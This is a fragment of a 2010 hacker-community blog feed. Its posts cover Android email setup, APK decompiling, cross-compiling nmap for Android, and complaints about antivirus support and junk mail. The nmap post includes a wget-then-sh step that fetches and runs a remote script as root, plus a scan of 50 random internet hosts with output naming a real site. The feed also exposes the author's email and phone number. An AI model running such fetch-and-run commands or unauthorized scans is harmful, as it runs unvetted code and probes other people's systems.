&lt;li&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;Press the E-Mail icon (the default Android E-Mail application)&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/li&gt;
&lt;li&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;Enter your Yahoo E-Mail address and password&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/li&gt;
&lt;li&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;Press “Manual Setup” in the lower left hand corner&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/li&gt;
&lt;li&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;For “Incoming Server Settings” set the IMAP server to “imap.mail.yahoo.com” and the Port to 143&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/li&gt;
&lt;li&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;For “Outgoing Server Settings” set the SMTP Server to “smtp.mobile.mail.yahoo.com” and the Port to 587&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/li&gt;
&lt;li&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;Check “Require sign-in” and press Next&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/li&gt;
&lt;li&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;Select how often your phone will check for Email, and choose default options&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/li&gt;
&lt;li&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;Give the account a name and set your display name for outgoing messages&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/li&gt;
&lt;/ol&gt;                    </content>
                                    </entry>
                            <entry>
                    <title>[Guide] baksmali guide howto example</title>
                    <link rel="alternate" href="http://houseofhackers.ning.com/xn/detail/2092781:BlogPost:156404"/>
                                        <id>tag:houseofhackers.ning.com,2010-02-18:2092781:BlogPost:156404</id>
                                        <updated>2010-02-18T19:49:14.000Z</updated>
                                        <author><name>operat0r</name></author>
                    <summary type="html">
                        &lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;02/18/2010 - &lt;a href=&quot;http://rmccurdy.com/scripts/&quot;&gt;quickbaksmali.zip&lt;/a&gt; &lt;br/&gt;
&lt;br/&gt;
* requires java ! in %PATH% !&lt;br/&gt;
* just place the java_ee_sdk-5 folder to make it portable !&lt;br/&gt;
* put the APKS files in the folder&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&amp;hellip;                    </summary>
                    <content type="html">
                        &lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;02/18/2010 - &lt;a href=&quot;http://rmccurdy.com/scripts/&quot;&gt;quickbaksmali.zip&lt;/a&gt; &lt;br/&gt;
&lt;br/&gt;
* requires java ! in %PATH% !&lt;br/&gt;
* just place the java_ee_sdk-5 folder to make it portable !&lt;br/&gt;
* put the APKS files in the folder APKS &lt;br/&gt;
* you (can) edit the job2.bat with your keytool/key info etc ..&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
* run the baksmali.bat&lt;br/&gt;
* make your changes etc&lt;br/&gt;
* run the smali.bat&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;                    </content>
                                    </entry>
                            <entry>
                    <title>NMAP FOR ANDROID CROSS COMPILE ARM</title>
                    <link rel="alternate" href="http://houseofhackers.ning.com/xn/detail/2092781:BlogPost:156402"/>
                                        <id>tag:houseofhackers.ning.com,2010-02-18:2092781:BlogPost:156402</id>
                                        <updated>2010-02-18T19:00:00.000Z</updated>
                                        <author><name>operat0r</name></author>
                    <summary type="html">
                        NMAP FOR ANDROID CROSS COMPILE ARM &lt;br/&gt;&lt;br/&gt;&lt;pre&gt;# from android root prompt&lt;br/&gt;wget &lt;a href=&quot;http://rmccurdy.com/nmap.sh&quot;&gt;http://rmccurdy.com/nmap.sh&lt;/a&gt;&lt;br/&gt;sh nmap.sh&lt;br/&gt;cd /data/local/bin&lt;br/&gt;nmap -v -iR 50 -PN -p 80 -n -A&lt;br/&gt;&lt;/pre&gt;
&lt;br/&gt;&lt;br/&gt;This MAY work for other platforms but tested on cygonmod as of 2/18/2010 on&lt;br/&gt;
Android G1 plan to APK package this up with other security tools&lt;br/&gt;
ruby/metasploit etc ..&lt;br/&gt;&lt;br/&gt;• SYN scans may not REALLY be working … along with other ‘features’&amp;hellip;                    </summary>
                    <content type="html">
                        NMAP FOR ANDROID CROSS COMPILE ARM &lt;br/&gt;&lt;br/&gt;&lt;pre&gt;# from android root prompt&lt;br/&gt;wget &lt;a href=&quot;http://rmccurdy.com/nmap.sh&quot;&gt;http://rmccurdy.com/nmap.sh&lt;/a&gt;&lt;br/&gt;sh nmap.sh&lt;br/&gt;cd /data/local/bin&lt;br/&gt;nmap -v -iR 50 -PN -p 80 -n -A&lt;br/&gt;&lt;/pre&gt;
&lt;br/&gt;&lt;br/&gt;This MAY work for other platforms but tested on cygonmod as of 2/18/2010 on&lt;br/&gt;
Android G1 plan to APK package this up with other security tools&lt;br/&gt;
ruby/metasploit etc ..&lt;br/&gt;&lt;br/&gt;• SYN scans may not REALLY be working … along with other ‘features’ of nmap ..&lt;br/&gt;•
Copy eveything in &lt;a href=&quot;http://rmccurdy.com/stuff/G1/BINS/NMAP/&quot;&gt;http://rmccurdy.com/stuff/G1/BINS/NMAP/&lt;/a&gt; to&lt;br/&gt;
/data/local/bin on the Android and cd /data/local/bin &lt;br/&gt;&lt;br/&gt;&lt;br/&gt;• You may need to ‘mount -o remount / /` and put sh or bash ( the busybox bash ) in /bin/sh &lt;br/&gt;• Or alternative export SHELL=/system/bin/sh may work ..&lt;br/&gt;• &lt;a href=&quot;http://delicious.com/operat0r/android&quot;&gt;http://delicious.com/operat0r/android&lt;/a&gt; reference&lt;br/&gt;• Some tips for cross compiling:&lt;br/&gt;- Start with simple! bash or ‘hello world’&lt;br/&gt;- Make sure the file is ARM / STATIC &lt;br/&gt; nmap: ELF 32-bit LSB executable, ARM, version 1 (SYSV), for GNU/Linux 2.6.14, statically linked, not stripped&lt;br/&gt;- If you get ‘not found’ it may be the /bin/sh issue or missing libs&lt;br/&gt;- You can use strace and gdb from my site or &lt;a href=&quot;http://ortegaalfredo.googlepages.com/android&quot;&gt;http://ortegaalfredo.googlepages.com/android&lt;/a&gt;&lt;br/&gt;-
&lt;br/&gt;
For nmap and others I had to pre compile the libs and or hack up the&lt;br/&gt;
configure and/or make file so if something fails try to compile each&lt;br/&gt;
lib in the folder take it folder by folder&lt;br/&gt;&lt;br/&gt;EXAMPLE OUTPUT:&lt;br/&gt;uname -a&lt;br/&gt;Linux localhost 2.6.29.6-cm42 #11 PREEMPT Sun Jan 3 23:10:50 EST 2010 armv6l GNU&lt;br/&gt;/Linux&lt;br/&gt;#&lt;br/&gt;&lt;br/&gt;Starting Nmap 4.01 ( &lt;a href=&quot;http://www.insecure.org/nmap/&quot;&gt;http://www.insecure.org/nmap/&lt;/a&gt; ) at 2010-02-18 19:04 UTC&lt;br/&gt;Warning: OS detection will be MUCH less reliable because we did not find at lea&lt;br/&gt;st 1 open and 1 closed TCP port&lt;br/&gt;Interesting ports on diecastaircraftshop.com (63.249.18.249):&lt;br/&gt;PORT STATE SERVICE VERSION&lt;br/&gt;21/tcp open tcpwrapped&lt;br/&gt;25/tcp open smtp?&lt;br/&gt;80/tcp open http Microsoft IIS webserver 7.0&lt;br/&gt;443/tcp open https?&lt;br/&gt;Device type: general purpose&lt;br/&gt;Running (JUST GUESSING) : FreeBSD 5.X (85%)&lt;br/&gt;Aggressive OS guesses: FreeBSD 5.3-STABLE (85%)&lt;br/&gt;No exact OS matches for host (test conditions non-ideal).&lt;br/&gt;Uptime 43.977 days (since Tue Jan 5 19:39:44 2010)&lt;br/&gt;Service Info: OS: Windows&lt;br/&gt;&lt;br/&gt;Nmap finished: 1 IP address (1 host up) scanned in 141.397 seconds&lt;br/&gt;#&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;MINI HOWTO:&lt;br/&gt;&lt;br/&gt;# you need sun-java5-jdk&lt;br/&gt;echo &#039;deb &lt;a href=&quot;http://us.archive.ubuntu.com/ubuntu/&quot;&gt;http://us.archive.ubuntu.com/ubuntu/&lt;/a&gt; jaunty multiverse&#039; &amp;gt;&amp;gt; /etc/apt/sources.list&lt;br/&gt;echo &#039;deb &lt;a href=&quot;http://us.archive.ubuntu.com/ubuntu/&quot;&gt;http://us.archive.ubuntu.com/ubuntu/&lt;/a&gt; jaunty-updates multiverse &#039; &amp;gt;&amp;gt; /etc/apt/sources.list&lt;br/&gt;&lt;br/&gt;apt-get update&lt;br/&gt;apt-get install build-essential -y&lt;br/&gt;apt-get install m4 -y&lt;br/&gt;aptitude install git-core git jfsutils xfsprogs quota isdnutils-base nfs-common oprofile -y&lt;br/&gt;&lt;br/&gt;apt-get install sun-java5-jdk -y&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;# toolchain for cross compile&lt;br/&gt;wget
&quot;http://www.codesourcery.com/sgpp/lite/arm/portal/package3696/public/arm-none-linux-gnueabi/arm-2008q3-72-arm-none-linux-gnueabi-i686-pc-linux-gnu.tar.bz2&quot;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;a href=&quot;http://zenmachine.wordpress.com/cross-compiling-ruby-to-arm-processors-the-not-so-zen-way/&quot;&gt;http://zenmachine.wordpress.com/cross-compiling-ruby-to-arm-processors-the-not-so-zen-way/&lt;/a&gt;&lt;br/&gt;http://android-dev.g.hatena.ne.jp/takuma104/&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;# download nmap-4.01.tar.gz&lt;br/&gt;# precompile dftables cd ./libpcre/ ; ./configure ; make;cp dftables /usr/local/sbin/&lt;br/&gt;# make clean and cp /usr/local/sbin/dftables ./libpcre/&lt;br/&gt;#
precompile libpcap I got libpcap-0.7.1 to compile OK for AM &#039;&lt;br/&gt;
--with-libpcap=/home/operat0r/libpcap-0.7.1/ &#039; change to your path&lt;br/&gt;# before you make vi the Main Make file to STATIC = -static&lt;br/&gt;# my last line after make looked like:&lt;br/&gt;&lt;br/&gt;arm-none-linux-gnueabi-g++
-Llibpcap -Lnbase -Lnsock/src/ -static -o nmap main.o&lt;br/&gt;
nmap.o targets.o tcpip.o nmap_error.o utils.o idle_scan.o osscan.o&lt;br/&gt;
output.o scan_engine.o timing.o charpool.o services.o protocols.o&lt;br/&gt;
nmap_rpc.o portlist.o NmapOps.o TargetGroup.o Target.o&lt;br/&gt;
FingerPrintResults.o service_scan.o NmapOutputTable.o MACLookup.o tty.o&lt;br/&gt;
nmap_dns.o -lnbase -lnsock libpcre/libpcre.a -lpcap&lt;br/&gt;
&lt;br/&gt;
libdnet-stripped/src/.libs/libdnet.a -lm&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;export ac_cv_linux_vers=2.6.31&lt;br/&gt;export CC=/usr/local/arm-2008q3/bin/arm-none-linux-gnueabi-gcc -static&lt;br/&gt;export LD=/usr/local/arm-2008q3/bin/arm-none-linux-gnueabi-ld&lt;br/&gt;export AR=/usr/local/arm-2008q3/bin/arm-none-linux-gnueabi-ar&lt;br/&gt;export RANLIB=/usr/local/arm-2008q3/arm-none-linux-gnueabi/bin/ranlib&lt;br/&gt;export PATH=$PATH:/usr/local/arm-2008q3/bin&lt;br/&gt;export PATH=$PATH:/usr/local/arm-2008q3/&lt;br/&gt;export PATH=$PATH:/usr/local/arm-2008q3/lib&lt;br/&gt;export ac_cv_func_getpgrp_void=yes&lt;br/&gt;export ac_cv_func_setpgrp_void=yes&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;./configure
--host=arm-none-linux-gnueabi --target=arm-none-linux-gnueabi&lt;br/&gt;
--with-libpcap=/home/operat0r/libpcap-0.7.1/ --without-nmapfe&lt;br/&gt;
--with-pcap=linux&lt;br/&gt;&lt;br/&gt; &lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;                    </content>
                                    </entry>
                            <entry>
                    <title>sabnzbd cleanup script</title>
                    <link rel="alternate" href="http://houseofhackers.ning.com/xn/detail/2092781:BlogPost:153046"/>
                                        <id>tag:houseofhackers.ning.com,2010-02-04:2092781:BlogPost:153046</id>
                                        <updated>2010-02-04T03:05:26.000Z</updated>
                                        <author><name>operat0r</name></author>
                    <summary type="html">
                        find /home/mythtv/downloads/complete/Movies -type f -size -100000 -exec rm {} \;&lt;br /&gt;
find /home/mythtv/downloads/complete/TV -type f -size -100000 -exec rm {} \;                    </summary>
                    <content type="html">
                        find /home/mythtv/downloads/complete/Movies -type f -size -100000 -exec rm {} \;&lt;br /&gt;
find /home/mythtv/downloads/complete/TV -type f -size -100000 -exec rm {} \;                    </content>
                                    </entry>
                            <entry>
                    <title>best software WORST SUPPORT EVER !</title>
                    <link rel="alternate" href="http://houseofhackers.ning.com/xn/detail/2092781:BlogPost:152863"/>
                                        <id>tag:houseofhackers.ning.com,2010-02-02:2092781:BlogPost:152863</id>
                                        <updated>2010-02-02T18:08:19.000Z</updated>
                                        <author><name>operat0r</name></author>
                    <summary type="html">
                        * I have used active scan for ever when it was in beta and did not work for Firefox it was the best&lt;br /&gt;
* I LOVE the software small download compare to KAV online scanner!!!&lt;br /&gt;
* your support is the WORST I have ever experienced in my 20 years as Network/ Security consultant ...&lt;br /&gt;
&lt;br /&gt;
Original issue was auto renew failed so I paid again and registered under freeload101@yahoo.com ... well that broke something it said I have 2.0 when you log in but just spammed (buy now) all the time...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
so after trying to&amp;hellip;                    </summary>
                    <content type="html">
                        * I have used active scan for ever when it was in beta and did not work for Firefox it was the best&lt;br /&gt;
* I LOVE the software small download compare to KAV online scanner!!!&lt;br /&gt;
* your support is the WORST I have ever experienced in my 20 years as Network/ Security consultant ...&lt;br /&gt;
&lt;br /&gt;
Original issue was auto renew failed so I paid again and registered under freeload101@yahoo.com ... well that broke something it said I have 2.0 when you log in but just spammed (buy now) all the time...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
so after trying to change the email etc and logging in and out clearing cache and running from different computers I opened up a ticket only to be told to call tech support ( this was on a Saturday I received the email ... ) so I replied &quot;&lt;br /&gt;
[code]&lt;br /&gt;
Flag this message&lt;br /&gt;
Re: Panda Security #PS# - Case number: 02633450 [ ref:00D27CUo.50028Rrir:ref ]&lt;br /&gt;
Sunday, January 24, 2010 2:31 AM&lt;br /&gt;
From:&lt;br /&gt;
&quot;robert mccurdy&quot;&lt;br /&gt;
View contact details&lt;br /&gt;
To:&lt;br /&gt;
&quot;Tech Support&quot;&lt;br /&gt;
first off that&#039;s not really an answer ... but guess I don&#039;t have a choice ...&lt;br /&gt;
&lt;br /&gt;
second I got the email at &#039;Sunday, January 24, 2010 1:59 AM&#039; so how am I pose to call a support desk that&#039;s not even open on Sunday ...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[/code]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
I called only to find that no 24-7 phone support.. ok that’s fine its 20$ .. ( I would be furious if I paid for the full crap bloat ware that is the desktop etc download I don&#039;t believe in AV anyway so ..&#039;more info here rmccurdy.com/email.html&#039; ) I call and get spammed with all this windows 2007 fix garbage before I even get put in the support que... ( im running XP try to ask the person before you make them listen to your 10min spheal about windows 2007 .. or at least let me press &#039;0&#039; to skip ... ) anyway finally a pickup I get the normal support I have to login clear cookie etc I get put on hold etc and he comes back we talked a bit I hung up on him by mistake ... so I called back ( on hold for over ~20min ) to pickup and say ( hey we call you back ) I think OK fine whatever I give them my number nobody ever calls back ...&lt;br /&gt;
&lt;br /&gt;
Later that night I reply to the ticket that I never got a phone call next day I all back and complain I never got a call back they say (the ticket has been escalated) I told them from the beginning I don&#039;t care what you do just get me a working account out of the TWO that I have ... ( one was new other was old an unpaid )&lt;br /&gt;
&lt;br /&gt;
I once again reply to the ticket:&lt;br /&gt;
[code]&lt;br /&gt;
&lt;br /&gt;
IM FURIOUS ! PLEASE CALL ME IMMEDIATELY ! !!!!!! YOU DID NOT CALL ME BACK !!!!!&lt;br /&gt;
&lt;br /&gt;
THIS IS THE 3RD TIME i HAVE CALLED !!!&lt;br /&gt;
xxx.xxx.xxxx&quot;&lt;br /&gt;
[/code]&lt;br /&gt;
2/2/2010:&lt;br /&gt;
&lt;br /&gt;
I call and get the &quot; we are not open&quot; so I wait a few hrs and again on hold for ~10min to only be answered by a &quot;what is your number we are all busy &quot;&lt;br /&gt;
&lt;br /&gt;
in the past I have suggested people use panda active-scan and even if forbidden by me they want a desktop AV I also suggested Panda. From now on I will never use a Panda or Panda software affiliate application or service!&lt;br /&gt;
&lt;br /&gt;
bottom line is I gave you guys like 5 chances to do it right or...... @#$^ do anything for that matter ... I’m done with panda and the worst support in my life it’s been a good run for you the past 5 or so years but I’m done ... I refuse to pay AGAIN under a different account / email just to get the software working again...&lt;br /&gt;
&lt;br /&gt;
If you have any questions about this post please call and leave me a message with contact info etc:&lt;br /&gt;
&lt;br /&gt;
=================&lt;br /&gt;
Robert McCurdy&lt;br /&gt;
Network / Systems Consultant&lt;br /&gt;
&lt;a href=&quot;http://rmccurdy.com&quot;&gt;http://rmccurdy.com&lt;/a&gt;&lt;br /&gt;
404.647.4250&lt;br /&gt;
=================                    </content>
                                    </entry>
                            <entry>
                    <title>Yahoo newzbin rottentomatoes rotten tomatoes nzb ratings SABnsb magic filter thingy</title>
                    <link rel="alternate" href="http://houseofhackers.ning.com/xn/detail/2092781:BlogPost:152158"/>
                                        <id>tag:houseofhackers.ning.com,2010-01-27:2092781:BlogPost:152158</id>
                                        <updated>2010-01-27T19:53:46.000Z</updated>
                                        <author><name>operat0r</name></author>
                    <summary type="html">
                        &lt;a href=&quot;http://pipes.yahoo.com/pipes/pipe.run?_id=f005ab1acd635c747d2cbfa4b0adf3ea&amp;amp;_render=rss&quot;&gt;http://pipes.yahoo.com/pipes/pipe.run?_id=f005ab1acd635c747d2cbfa4b0adf3ea&amp;amp;_render=rss&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
if you use sabnzbd just plug in this url and you will get rottentomatoes.com &amp;gt; 60% nzbs that are not screeners and ~800m-4gig&lt;br /&gt;
&lt;br /&gt;
here is my TV torrent filters:&lt;br /&gt;
&lt;a href=&quot;http://rmccurdy.com/public_images/sabnzbd_filters.jpg&quot;&gt;http://rmccurdy.com/public_images/sabnzbd_filters.jpg&lt;/a&gt;&lt;br /&gt;
* will add regex fo&amp;hellip;                    </summary>
                    <content type="html">
                        &lt;a href=&quot;http://pipes.yahoo.com/pipes/pipe.run?_id=f005ab1acd635c747d2cbfa4b0adf3ea&amp;amp;_render=rss&quot;&gt;http://pipes.yahoo.com/pipes/pipe.run?_id=f005ab1acd635c747d2cbfa4b0adf3ea&amp;amp;_render=rss&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
if you use sabnzbd just plug in this url and you will get rottentomatoes.com &amp;gt; 60% nzbs that are not screeners and ~800m-4gig&lt;br /&gt;
&lt;br /&gt;
here is my TV torrent filters:&lt;br /&gt;
&lt;a href=&quot;http://rmccurdy.com/public_images/sabnzbd_filters.jpg&quot;&gt;http://rmccurdy.com/public_images/sabnzbd_filters.jpg&lt;/a&gt;&lt;br /&gt;
* will add regex for things like ^house later ... but you get the point&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
let me know if you &#039;fix&#039; the output of the yahoopipe because it says something like &quot;Yahoo::RSS::Item=HASH(0x38cdc84)&quot; for everything I broke the output but it works right some how                    </content>
                    <enclosure url="http://rmccurdy.com/public_images/sabnzbd_filters.jpg" type="image/jpeg"/>                </entry>
                            <entry>
                    <title>just fitness</title>
                    <link rel="alternate" href="http://houseofhackers.ning.com/xn/detail/2092781:BlogPost:150753"/>
                                        <id>tag:houseofhackers.ning.com,2010-01-18:2092781:BlogPost:150753</id>
                                        <updated>2010-01-18T20:34:35.000Z</updated>
                                        <author><name>operat0r</name></author>
                    <summary type="html">
                        Just Fitness 4U&lt;br /&gt;
&lt;a href=&quot;http://www.justfitness4u.com&quot;&gt;www.justfitness4u.com&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
6335 Roswell Rd&lt;br /&gt;
Sandy Springs, GA 30328&lt;br /&gt;
(404) 303-0496&lt;br /&gt;
&lt;br /&gt;
* number on parcel 6784667107,&lt;br /&gt;
* guy had no idea and asked if I was a member he gave me a national fitness number 800 658 7727&lt;br /&gt;
* on hole for 5min gave up                    </summary>
                    <content type="html">
                        Just Fitness 4U&lt;br /&gt;
&lt;a href=&quot;http://www.justfitness4u.com&quot;&gt;www.justfitness4u.com&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
6335 Roswell Rd&lt;br /&gt;
Sandy Springs, GA 30328&lt;br /&gt;
(404) 303-0496&lt;br /&gt;
&lt;br /&gt;
* number on parcel 6784667107,&lt;br /&gt;
* guy had no idea and asked if I was a member he gave me a national fitness number 800 658 7727&lt;br /&gt;
* on hole for 5min gave up                    </content>
                                    </entry>
                            <entry>
                    <title>Sovereign Pest Control www.southernpestcontrol.com 5825 Glenridge Drive Northeast Atlanta, GA 30328-5399 (404) 633-3139</title>
                    <link rel="alternate" href="http://houseofhackers.ning.com/xn/detail/2092781:BlogPost:150752"/>
                                        <id>tag:houseofhackers.ning.com,2010-01-18:2092781:BlogPost:150752</id>
                                        <updated>2010-01-18T20:24:30.000Z</updated>
                                        <author><name>operat0r</name></author>
                    <summary type="html">
                        Sovereign Pest Control&lt;br /&gt;
&lt;a href=&quot;http://www.southernpestcontrol.com&quot;&gt;www.southernpestcontrol.com&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
5825 Glenridge Drive Northeast&lt;br /&gt;
Atlanta, GA 30328-5399&lt;br /&gt;
(404) 633-3139&lt;br /&gt;
&lt;br /&gt;
* 404 633 3140&lt;br /&gt;
&lt;br /&gt;
* Very nice Male looked up my name in database and removed it.                    </summary>
                    <content type="html">
                        Sovereign Pest Control&lt;br /&gt;
&lt;a href=&quot;http://www.southernpestcontrol.com&quot;&gt;www.southernpestcontrol.com&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
5825 Glenridge Drive Northeast&lt;br /&gt;
Atlanta, GA 30328-5399&lt;br /&gt;
(404) 633-3139&lt;br /&gt;
&lt;br /&gt;
* 404 633 3140&lt;br /&gt;
&lt;br /&gt;
* Very nice Male looked up my name in database and removed it.                    </content>
                                    </entry>
                            <entry>
                    <title>Chase ( fake check spam )</title>
                    <link rel="alternate" href="http://houseofhackers.ning.com/xn/detail/2092781:BlogPost:150749"/>
                                        <id>tag:houseofhackers.ning.com,2010-01-18:2092781:BlogPost:150749</id>
                                        <updated>2010-01-18T20:18:51.000Z</updated>
                                        <author><name>operat0r</name></author>
                    <summary type="html">
                        * No phone number on parcel&lt;br /&gt;
* 1-800-432-3117,,,(wait for ever) ,,, ( press 0 ),,, ( Indian answered the phone )                    </summary>
                    <content type="html">
                        * No phone number on parcel&lt;br /&gt;
* 1-800-432-3117,,,(wait for ever) ,,, ( press 0 ),,, ( Indian answered the phone )                    </content>
                                    </entry>
                            <entry>
                    <title>Clear WIMAX provider</title>
                    <link rel="alternate" href="http://houseofhackers.ning.com/xn/detail/2092781:BlogPost:150746"/>
                                        <id>tag:houseofhackers.ning.com,2010-01-18:2092781:BlogPost:150746</id>
                                        <updated>2010-01-18T20:05:35.000Z</updated>
                                        <author><name>operat0r</name></author>
                    <summary type="html">
                        * 1 888 210 4459&lt;br /&gt;
easy removal no long hold time                    </summary>
                    <content type="html">
                        * 1 888 210 4459&lt;br /&gt;
easy removal no long hold time                    </content>
                                    </entry>
                            <entry>
                    <title>the leukemia lymphoma society Georgia Chapter</title>
                    <link rel="alternate" href="http://houseofhackers.ning.com/xn/detail/2092781:BlogPost:150745"/>
                                        <id>tag:houseofhackers.ning.com,2010-01-18:2092781:BlogPost:150745</id>
                                        <updated>2010-01-18T20:01:10.000Z</updated>
                                        <author><name>operat0r</name></author>
                    <summary type="html">
                        * mailed me a nickle with address labels&lt;br /&gt;
* no phone number or contact on parcel&lt;br /&gt;
* 800 955 4572,,,1, on website site ( info site .. don think this is what I want )&lt;br /&gt;
* THE GEORGIA CHAPTER&lt;br /&gt;
&lt;br /&gt;
3715 Northside Parkway&lt;br /&gt;
400 Northcreek, Suite 300&lt;br /&gt;
Atlanta, GA 30327&lt;br /&gt;
404-720-7900&lt;br /&gt;
(800) 399-7312 (Toll Free)&lt;br /&gt;
404-720-7878 (Fax)&lt;br /&gt;
&lt;br /&gt;
* (800) 399-7312,9 ( left message no apparent way to be removed from mailing list )                    </summary>
                    <content type="html">
                        * mailed me a nickle with address labels&lt;br /&gt;
* no phone number or contact on parcel&lt;br /&gt;
* 800 955 4572,,,1, on website site ( info site .. don think this is what I want )&lt;br /&gt;
* THE GEORGIA CHAPTER&lt;br /&gt;
&lt;br /&gt;
3715 Northside Parkway&lt;br /&gt;
400 Northcreek, Suite 300&lt;br /&gt;
Atlanta, GA 30327&lt;br /&gt;
404-720-7900&lt;br /&gt;
(800) 399-7312 (Toll Free)&lt;br /&gt;
